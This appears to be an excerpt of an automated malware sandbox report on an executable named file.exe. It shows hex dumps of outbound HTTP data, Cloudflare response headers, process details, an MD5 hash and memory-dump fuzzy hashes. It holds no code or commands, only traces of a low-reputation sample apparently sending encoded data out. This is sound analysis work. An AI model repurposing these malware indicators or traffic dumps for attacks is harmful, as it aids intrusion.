                                                                2024-10-31 10:28:00 UTC15331OUTData Raw: d9 2c 99 a4 46 dd b4 78 b4 3a 3f 30 b3 ba 5d 5e b3 dd a7 9a c0 e8 e6 e6 33 44 3b ab 43 6e e0 80 59 b2 a1 a0 d8 0b 31 f0 23 2a 4b 25 6e 80 a1 05 22 a6 f6 96 9f c5 81 1d 22 28 d9 c0 ab 2d d9 c7 4d 65 ed e9 33 26 a4 bb 01 b6 95 ab d9 cb 79 fa 59 dc 15 d7 ed 97 97 21 b0 3e fb 37 ef ec 5f 44 a0 63 80 64 08 9d ee e4 9e 87 a3 09 9c c5 c7 b3 ed c4 93 23 a7 e7 28 9a b8 db 4b 6b e1 9d 92 17 ce 38 df cf b1 c0 8b 54 2e 2d df 0c e0 e7 dc 95 bb 2d 73 4c c8 ea cb 45 ad 65 67 ee d5 47 8d 9e 3a a3 9b c9 a1 83 3d 23 e8 42 eb 0b be b5 36 b9 e3 5b f2 0f 7a 16 3e 42 48 f1 1a 40 b1 c6 d7 7e 84 ec c7 c6 5a ea 34 30 0c ed 5a 01 db d0 59 e4 7f 97 20 c6 bb ec 5c 76 a4 8a 34 3c 96 d1 84 fb 1f e8 62 02 26 7e a4 e6 8c 13 7c 07 64 05 83 4b bb 91 80 20 da 1c b4 35 c6 a8 03 7e 7d 60 be
                                                                Data Ascii: ,Fx:?0]^3D;CnY1#*K%n""(-Me3&yY!>7_Dcd#(Kk8T.--sLEegG:=#B6[z>BH@~Z40ZY \v4<b&~|dK 5~}`
                                                                2024-10-31 10:28:00 UTC15331OUTData Raw: f0 69 cf 3f 43 f2 96 bf 0b 13 99 68 58 00 c3 bf 28 83 ee 9a 98 9c 77 63 d9 0e c4 e8 2b 69 41 26 e2 7d a5 d3 e7 1b 5c 95 b3 e7 27 d2 4d 1c 14 2f 2b 3f d7 9f 57 eb 70 4b b0 ad 57 92 8f d0 bd 2c 9c c4 d3 84 fc 42 1b 09 db 5b 4e bb 4c 5a 26 8e 84 f7 e3 83 dc a1 ec ca 55 b5 f2 9f d8 e2 c7 91 63 f7 cd f4 23 78 a0 37 43 dd 23 23 aa f4 af 44 6e 66 50 e9 33 bf 3f 25 de df 22 33 54 83 de 48 92 e9 bd e2 82 dd bf 33 6d 25 de 9f 2e af a4 a7 08 92 7d 4e ff fe 73 37 04 04 3b fb f9 30 e0 91 72 e6 63 57 64 76 22 f5 f6 bc 26 bb 46 9c eb e9 5f f6 a4 ce bb e2 06 4f cb 61 f5 e8 2b 7d cb 63 a6 90 dd 71 77 fb eb dc 7f bf 57 3c 8e d2 e8 96 ac 13 84 f7 72 bc 19 2c 0c ee d6 aa 78 38 fe fc 56 76 98 71 a4 84 3e 6a b5 b6 16 69 33 e7 d6 7c 27 6f 2d 07 91 89 00 23 0b ed 18 4d 7f cf c8
                                                                Data Ascii: i?ChX(wc+iA&}\'M/+?WpKW,B[NLZ&Uc#x7C##DnfP3?%"3TH3m%.}Ns7;0rcWdv"&F_Oa+}cqwW<r,x8Vvq>ji3|'o-#M
                                                                2024-10-31 10:28:00 UTC15331OUTData Raw: 61 dd 10 eb a3 6b 7d 37 36 6b 34 f3 f8 03 5d 8f af 36 da c6 8e 32 1e 28 ca b7 d5 10 3d c6 0e e3 a2 55 bb 00 77 72 3e ea 24 1e 2e ba dd 31 57 cf b6 70 cf 4e c4 1d d8 29 8f 30 5f 61 5e e3 41 54 15 b2 f2 e5 cf 71 d2 48 29 84 c4 71 e1 2f e3 74 fd 13 c7 45 34 1c 61 d9 b9 ab 63 b6 11 84 d1 5a 01 ee 2d 60 f3 d5 58 02 20 38 6f 46 ad d1 16 04 d8 c5 5b 24 fb 78 e4 ef b5 93 b6 d9 e8 98 b5 70 3b b3 fa bb 18 4a da 06 26 66 7c 48 17 a3 d5 8a 48 48 22 b6 32 91 2c e4 ec cf bf 71 f2 c3 7c 1f bf 93 8f c7 46 99 51 98 cf c4 19 e7 b0 79 84 e2 b2 ad 44 e5 a5 af 93 9a ed 8d ab 8a 3a af 76 50 51 11 b7 a5 08 7d e1 ef 0e e3 3d 01 ec 2f 72 e8 68 2b 73 4a bf ed 67 2b e9 c9 2e 99 fb e6 2a 93 e7 7a 72 c9 1d 95 9c 8f c7 74 69 24 df 2d d1 cd 37 07 3a 14 f5 94 f0 89 f5 69 0a 76 18 c2 fd
                                                                Data Ascii: ak}76k4]62(=Uwr>$.1WpN)0_a^ATqH)q/tE4acZ-`X 8oF[$xp;J&f|HHH"2,q|FQyD:vPQ}=/rh+sJg+.*zrti$-7:iv
                                                                2024-10-31 10:28:00 UTC15331OUTData Raw: c7 ad 5c 84 fe 77 dc 22 af cc fa 88 c7 bf bd b5 fe 6d 73 e9 e7 2e c0 5b 6d 02 90 b0 00 f3 ce 3d ee c5 01 8b d9 54 46 91 e8 70 d6 05 b3 17 f5 80 5a 92 44 ad 16 03 37 76 da e5 d4 7b 79 35 f0 8c c9 0e 5d 0c 78 de 29 26 9f 53 3d cd 71 7b d2 5c 7c 84 73 e3 7b ac 14 bc 97 75 20 35 46 02 e0 3b 70 0c 1c 01 df 8d 82 65 b7 be 68 7f 69 e1 65 3a d3 88 e8 72 67 8b 4b 16 28 58 37 b6 53 b8 25 4f f3 18 b0 b4 c8 6e a8 57 59 0b 49 6e 41 12 cb 51 aa 3d 6e 48 2d 65 a5 3e aa 3a 4b 55 5e e8 fe a2 0b 82 54 c9 01 5b 12 e0 c3 ba 99 a0 a1 cc d4 ab 62 be 3c cc 62 e6 f1 e8 8d 53 6f b0 57 86 1a d0 ba 5b f4 90 fe 1e 93 fc 73 25 9a 49 70 84 14 e8 6d c0 03 62 3e 40 89 57 1f a0 2b d1 94 92 4d 14 6f 6a 33 f7 46 19 09 82 55 7b b7 7a 3b 24 4b 70 8b 42 6c 30 36 0f df b1 b5 6b d6 8c 95 2a ea
                                                                Data Ascii: \w"ms.[m=TFpZD7v{y5]x)&S=q{\|s{u 5F;pehie:rgK(X7S%OnWYInAQ=nH-e>:KU^T[b<bSoW[s%Ipmb>@W+Moj3FU{z;$KpBl06k*
                                                                2024-10-31 10:28:01 UTC1025INHTTP/1.1 200 OK
                                                                Date: Thu, 31 Oct 2024 10:28:01 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Set-Cookie: PHPSESSID=0eko1ud5acouvidkkkm6o2db0r; expires=Mon, 24-Feb-2025 04:14:40 GMT; Max-Age=9999999; path=/
                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                Pragma: no-cache
                                                                cf-cache-status: DYNAMIC
                                                                vary: accept-encoding
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P6brJ7qw%2BPYRa%2B4t4tyJjPxs48RbiRskWFuI%2FZxn1KADyyHVTNfvcvoQxZ1VQdjEKsONRBEhSiyWasXSpKgAXPDX78Qd%2F8vvFojbBMo67bSgkIJyngiepKtDrnks1KmaZDZ%2F5Mo%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8db2f4ad5bffe72a-DFW
                                                                alt-svc: h3=":443"; ma=86400
                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1352&sent=215&recv=610&lost=0&retrans=0&sent_bytes=2844&recv_bytes=572682&delivery_rate=2100072&cwnd=222&unsent_bytes=0&cid=d715826487d05dc8&ts=1766&x=0"


                                                                Target ID:0
                                                                Start time:06:27:48
                                                                Start date:31/10/2024
                                                                Path:C:\Users\user\Desktop\file.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                Imagebase:0x7a0000
                                                                File size:3'038'208 bytes
                                                                MD5 hash:D6D4C4264450023D69BDA4D017FE3771
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.2140689399.0000000000FF9000.00000004.00000020.00020000.00000000.sdmp, Offset: 00FF9000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_ff9000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cf5d0db71fd1755f9126b280e9fabfca5d8153590891a22b2047c7b534df828b
                                                                  • Instruction ID: c4ffeb77534b6a6446915221cb1a05e5a71e5f96613d671291b47b1d4726076d
                                                                  • Opcode Fuzzy Hash: cf5d0db71fd1755f9126b280e9fabfca5d8153590891a22b2047c7b534df828b
                                                                  • Instruction Fuzzy Hash: 5331263140E3D99FC3179B74896A5A2BFB0AE1721171A15EFC8C18F1B3D3A8485AD762
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.2172028798.0000000001015000.00000004.00000020.00020000.00000000.sdmp, Offset: 01015000, based on PE: false
                                                                  • Associated: 00000000.00000003.2125906580.0000000001015000.00000004.00000020.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_1015000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a1ea834a868891060def7ffeabde8e9f2221de50728997cb368c57a240d8ade2
                                                                  • Instruction ID: 999a0dab5d0f9f68c5cc853e1875df12b18918ceeae396c1bb51ca9fcea4c93a
                                                                  • Opcode Fuzzy Hash: a1ea834a868891060def7ffeabde8e9f2221de50728997cb368c57a240d8ade2
                                                                  • Instruction Fuzzy Hash: ED41D03640A7C18FC716CF78C8515DA7FB5FF8231475988DAC4C0DE027C266A956CB46